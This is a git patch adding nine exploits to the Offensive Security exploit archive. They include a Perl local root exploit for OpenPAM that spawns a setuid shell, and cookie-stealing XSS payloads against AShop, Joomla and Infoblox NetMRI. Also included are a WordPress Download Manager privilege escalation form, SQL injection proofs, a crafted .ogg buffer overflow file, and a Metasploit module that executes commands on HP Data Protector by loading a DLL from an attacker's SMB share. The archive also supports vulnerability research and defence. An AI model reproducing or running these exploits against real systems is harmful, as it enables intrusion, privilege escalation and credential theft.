From 65bae5bbd05c1c41f02ade54c4fffa22ff0b6e6f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 8 Mar 2015 08:37:21 +0000 Subject: [PATCH] Update: 2015-03-08 9 new exploits --- files.csv | 9 ++ platforms/bsd/local/36296.pl | 52 ++++++++++ platforms/java/webapps/36299.txt | 17 ++++ platforms/php/webapps/36297.txt | 27 ++++++ platforms/php/webapps/36298.txt | 9 ++ platforms/php/webapps/36301.txt | 47 ++++++++++ platforms/php/webapps/36302.txt | 7 ++ platforms/php/webapps/36303.txt | 90 ++++++++++++++++++ platforms/windows/dos/36300.py | 48 ++++++++++ platforms/windows/remote/36304.rb | 151 ++++++++++++++++++++++++++++++ 10 files changed, 457 insertions(+) create mode 100755 platforms/bsd/local/36296.pl create mode 100755 platforms/java/webapps/36299.txt create mode 100755 platforms/php/webapps/36297.txt create mode 100755 platforms/php/webapps/36298.txt create mode 100755 platforms/php/webapps/36301.txt create mode 100755 platforms/php/webapps/36302.txt create mode 100755 platforms/php/webapps/36303.txt create mode 100755 platforms/windows/dos/36300.py create mode 100755 platforms/windows/remote/36304.rb diff --git a/files.csv b/files.csv index 35c9b2302..70c9b903a 100755 --- a/files.csv +++ b/files.csv @@ -32715,3 +32715,12 @@ id,file,description,date,author,platform,type,port 36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 'command_name' Parameter Remote Command Execution Vulnerability",2011-11-04,"Christophe de la Fuente",php,webapps,0 36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0 36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection Vulnerability",2011-11-08,Kalashinkov3,php,webapps,0 +36296,platforms/bsd/local/36296.pl,"OpenPAM 'pam_start()' Local Privilege Escalation Vulnerability",2011-11-09,IKCE,bsd,local,0 +36297,platforms/php/webapps/36297.txt,"AShop Open-Redirection and Cross Site Scripting Vulnerabilities",2011-11-09,"Infoserve Security Team",php,webapps,0 +36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 +36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI <= 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 +36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 '.ogg' File Buffer Overflow Vulnerability",2011-11-11,swami,windows,dos,0 +36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 +36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection Vulnerability",2011-11-14,E.Shahmohamadi,php,webapps,0 +36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection Vulnerability",2015-03-06,"ITAS Team",php,webapps,80 +36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,metasploit,windows,remote,5555 diff --git a/platforms/bsd/local/36296.pl b/platforms/bsd/local/36296.pl new file mode 100755 index 000000000..06b19cb5f --- /dev/null +++ b/platforms/bsd/local/36296.pl @@ -0,0 +1,52 @@ +source: http://www.securityfocus.com/bid/50607/info + +OpenPAM is prone to a local privilege-escalation vulnerability. + +Local attackers may exploit this issue to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. + +#!/usr/bin/perl + +# kcheckpass invoking pam_start() with user provided +# service argument, what a bad idea. OpenPAM accepts that. +# Maybe this pam_start() vulnerability is exploitable via +# other vectors as well. +# Vuln tested on a FreeBSD 8.1. It does not affect +# Linux PAM, as it is checking for / character + +# (C) 2011 by some dude, meant as a PoC! Only use on your own +# machine and on your own risk!!! +# +# This commit is likely to fix the bug: +# http://trac.des.no/openpam/changeset/478/trunk/lib/openpam_configure.c +# + +my $kcheckpass = "/usr/local/kde4/lib/kde4/libexec/kcheckpass"; + +# build suid shell +open(O,">/tmp/slam.c") or die $!; +print O< +#include + +void __attribute__((constructor)) init() +{ + char *a[] = {"/bin/sh", NULL}; + setuid(0); + execve(*a, a, NULL); +} +EOC +close(O); + +# build fake pam module +system("gcc -fPIC -Wall -c /tmp/slam.c -o /tmp/slam.o;gcc -shared -o /tmp/slam.so /tmp/slam.o"); + +# build fake PAM service file +open(O,">/tmp/pamslam") or die $!; +print O<alert(document.cookie)&mode=&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false \ No newline at end of file diff --git a/platforms/php/webapps/36297.txt b/platforms/php/webapps/36297.txt new file mode 100755 index 000000000..f976b96b4 --- /dev/null +++ b/platforms/php/webapps/36297.txt @@ -0,0 +1,27 @@ +source: http://www.securityfocus.com/bid/50616/info + +AShop is prone to multiple open-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input. + +Attackers can exploit these issues to execute arbitrary script or HTML code, steal cookie-based authentication credentials, and conduct phishing attacks. Other attacks may also be possible. + +Versions prior to AShop 5.1.4 are vulnerable. + +IE8 + +http://www.example.com/ashop/?'" +http://www.example.com/ashop/index.php?'" +http://www.example.com/ashop/picture.php?picture=" stYle=x:expre/**/ssion(alert(document.cookie)) ns=" +http://www.example.com/ashop/index.php?language='" + +FF 7.1 + +http://www.example.com/ashop/index.php?searchstring=1&showresult=true&exp='"&resultpage=&categories=off&msg=&search=index.php&shop=1 +http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage='"&msg= +http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1&msg='" +http://www.example.com/ashop/basket.php?cat=0&sid='"&shop=1&payoption=3 + +Open Redirection + +http://www.example.com/ashop/language.php?language=sv&redirect=http://www.google.com +http://www.example.com/ashop/currency.php?currency=aud&redirect=http://www.google.com +http://www.example.com/ashop/currency.php?redirect=http://www.google.com diff --git a/platforms/php/webapps/36298.txt b/platforms/php/webapps/36298.txt new file mode 100755 index 000000000..4e93af430 --- /dev/null +++ b/platforms/php/webapps/36298.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/50637/info + +Joomla! 'com_alfcontact' extension is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Joomla! 'com_alfcontact' extension 1.9.3 is vulnerable; prior versions may also be affected. + +&email=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&emailid=5%2c%2cCareers%20at%20Foreground%20Security&emailto_id=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&extravalue=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&message=20&name=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&option=com_alfcontact&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge&subject=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&task=sendemail \ No newline at end of file diff --git a/platforms/php/webapps/36301.txt b/platforms/php/webapps/36301.txt new file mode 100755 index 000000000..de18f8cff --- /dev/null +++ b/platforms/php/webapps/36301.txt @@ -0,0 +1,47 @@ +# Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation +# Date: 24-11-2014 +# Software Link: https://wordpress.org/plugins/download-manager/ +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# Category: webapps +# CVE: CVE-2014-9260 + +1. Description + +Every registered user can update every WordPress options using basic_settings() function. + +function basic_settings() +{ + if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') { + + foreach ($_POST as $optn => $optv) { + update_option($optn, $optv); + } + if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form'); + + + + die('Settings Saved Successfully'); + } + include('settings/basic.php'); +} + +http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html + +2. Proof of Concept + +Login as standard user (created using wp-login.php?action=register) then: + +
+ + + + +
+ +After that create new user using wp-login.php?action=register. Newly created user will have admin privileges. + +3. Solution: + +Update to version 2.7.3 \ No newline at end of file diff --git a/platforms/php/webapps/36302.txt b/platforms/php/webapps/36302.txt new file mode 100755 index 000000000..ff662e412 --- /dev/null +++ b/platforms/php/webapps/36302.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/50656/info + +Content component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI] \ No newline at end of file diff --git a/platforms/php/webapps/36303.txt b/platforms/php/webapps/36303.txt new file mode 100755 index 000000000..c4e99f254 --- /dev/null +++ b/platforms/php/webapps/36303.txt @@ -0,0 +1,90 @@ +#Vulnerability title: ProjectSend r561 - SQL injection vulnerability +#Product: ProjectSend r561 +#Vendor: http://www.projectsend.org/ +#Affected version: ProjectSend r561 +#Download link: http://www.projectsend.org/download/67/ +#Fixed version: N/A +#Author: Le Ngoc Phi (phi.n.le@itas.vn) & ITAS Team (www.itas.vn) + + +::PROOF OF CONCEPT:: + ++ REQUEST: +GET /projectsend/users-edit.php?id= HTTP/1.1 +Host: target.org +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 +Firefox/35.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: 54f8105d859e0_SESSION=q6tjpjjbt53nk1o5tnbv2123456; +PHPSESSID=jec50hu4plibu5p2p6hnvpcut6 +Connection: keep-alive + + +- Vulnerable file: client-edit.php +- Vulnerable parameter: id +- Vulnerable code: +if (isset($_GET['id'])) { + $client_id = mysql_real_escape_string($_GET['id']); + /** + * Check if the id corresponds to a real client. + * Return 1 if true, 2 if false. + **/ + $page_status = (client_exists_id($client_id)) ? 1 : 2; +} +else { + /** + * Return 0 if the id is not set. + */ + $page_status = 0; +} + +/** + * Get the clients information from the database to use on the form. + */ +if ($page_status === 1) { + $editing = $database->query("SELECT * FROM tbl_users WHERE +id=$client_id"); + while($data = mysql_fetch_array($editing)) { + $add_client_data_name = $data['name']; + $add_client_data_user = $data['user']; + $add_client_data_email = $data['email']; + $add_client_data_addr = $data['address']; + $add_client_data_phone = $data['phone']; + $add_client_data_intcont = $data['contact']; + if ($data['notify'] == 1) { $add_client_data_notity = 1; } +else { $add_client_data_notity = 0; } + if ($data['active'] == 1) { $add_client_data_active = 1; } +else { $add_client_data_active = 0; } + } +} + + + +::DISCLOSURE:: ++ 01/06/2015: Detect vulnerability ++ 01/07/2015: Contact to vendor ++ 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply ++ 03/05/2015: Public information + +::REFERENCE:: +- +http://www.itas.vn/news/itas-team-found-out-a-SQL-Injection-vulnerability-in +-projectsend-r561-76.html + + +::DISCLAIMER:: +THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF +ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY +IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE +OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS +A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION +OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, +AND AT THE USER'S OWN RISK. + + + +Best Regards, +--------------------------------------------------------------------- +ITAS Team (www.itas.vn) diff --git a/platforms/windows/dos/36300.py b/platforms/windows/dos/36300.py new file mode 100755 index 000000000..ce3d1bc0c --- /dev/null +++ b/platforms/windows/dos/36300.py @@ -0,0 +1,48 @@ +source: http://www.securityfocus.com/bid/50651/info + +Kool Media Converter is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. + +Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. + +Kool Media Converter 2.6.0 is vulnerable; other versions may also be affected. + +#!/usr/bin/env python +# +# +# Exploit Title: Kool Media Converter v2.6.0 DOS +# Date: 10/10/2011 +# Author: swami +# E-Mail: flavio[dot]baldassi[at]gmail[dot]com +# Software Link: http://www.bestwebsharing.com/downloads/kool-media-converter-setup.exe +# Version: 2.6.0 +# Tested on: Windows XP SP3 ENG +# +#--- From Vendor Website +# Kool Media Converter is a sound tool addressed to casual listeners and fervent +# audiophiles likewise. It deals with compatibility problems between your audio files +# and the media player you are using to help you enjoy all the songs you love anyway you like. +# +#--- Description +# Kool Media Converter fails to handle a malformed .ogg file + +ogg = b'\x4F\x67\x67\x53' # Capture Pattern OggS in ascii +ogg += b'\x00' # Version currently 0 +ogg += b'\x02' # Header Type of page that follows +ogg += b'\x00' * 8 # Granule Position +ogg += b'\xCE\xc6\x41\x49' # Bitstream Serial Number +ogg += b'\x00' * 4 # Page Sequence Number +ogg += b'\x70\x79\xf3\x3d' # Checksum +ogg += b'\x01' # Page Segment max 255 +ogg += b'\x1e\x01\x76\x6f' # Segment Table + +ogg += b'\x41' * 1000 + +try: + f = open('koolPoC.ogg','wb') + f.write(ogg) + f.close() +except: + print('\nError while creating ogg file\n') + + + diff --git a/platforms/windows/remote/36304.rb b/platforms/windows/remote/36304.rb new file mode 100755 index 000000000..6fce77369 --- /dev/null +++ b/platforms/windows/remote/36304.rb @@ -0,0 +1,151 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::SMB::Server::Share + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => 'HP Data Protector 8.10 Remote Command Execution', + 'Description' => %q{ + This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary + commands can be execute by sending crafted requests with opcode 28 to the OmniInet + service listening on the TCP/5555 port. Since there is an strict length limitation on + the command, rundll32.exe is executed, and the payload is provided through a DLL by a + fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on + Windows 7 SP1. + }, + 'Author' => [ + 'Christian Ramirez', # POC + 'Henoch Barrera', # POC + 'Matthew Hall ' # Metasploit Module + ], + 'References' => + [ + ['CVE', '2014-2623'], + ['OSVDB', '109069'], + ['EDB', '34066'], + ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true + }, + 'Privileged' => true, + 'Platform' => 'win', + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Targets' => + [ + [ 'HP Data Protector 8.10 / Windows', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 02 2014')) + + register_options( + [ + Opt::RPORT(5555), + OptString.new('FILE_NAME', [ false, 'DLL File name to share']), + OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) + ], self.class) + + deregister_options('FOLDER_NAME') + deregister_options('FILE_CONTENTS') + end + + def check + fingerprint = get_fingerprint + + if fingerprint.nil? + return Exploit::CheckCode::Unknown + end + + print_status("#{peer} - HP Data Protector version #{fingerprint}") + + if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ + minor = $1.to_i + else + return Exploit::CheckCode::Safe + end + + if minor < 11 + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Detected + end + + def peer + "#{rhost}:#{rport}" + end + + def get_fingerprint + ommni = connect + ommni.put(rand_text_alpha_upper(64)) + resp = ommni.get_once(-1) + disconnect + + if resp.nil? + return nil + end + + Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null + end + + def send_pkt(cmd) + cmd.gsub!("\\", "\\\\\\\\") + + pkt = "2\x00" + pkt << "\x01\x01\x01\x01\x01\x01\x00" + pkt << "\x01\x00" + pkt << "\x01\x00" + pkt << "\x01\x00" + pkt << "\x01\x01\x00 " + pkt << "28\x00" + pkt << "\\perl.exe\x00 " + pkt << "-esystem('#{cmd}')\x00" + + connect + sock.put([pkt.length].pack('N') + pkt) + disconnect + end + + def primer + self.file_contents = generate_payload_dll + print_status("File available on #{unc}...") + + print_status("#{peer} - Trying to execute remote DLL...") + sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" + send_pkt(sploit) + end + + def setup + super + + self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" + + unless file_name =~ /\.dll$/ + fail_with(Failure::BadConfig, "FILE_NAME must end with .dll") + end + end + + def exploit + begin + Timeout.timeout(datastore['SMB_DELAY']) {super} + rescue Timeout::Error + # do nothing... just finish exploit and stop smb server... + end + end +end \ No newline at end of file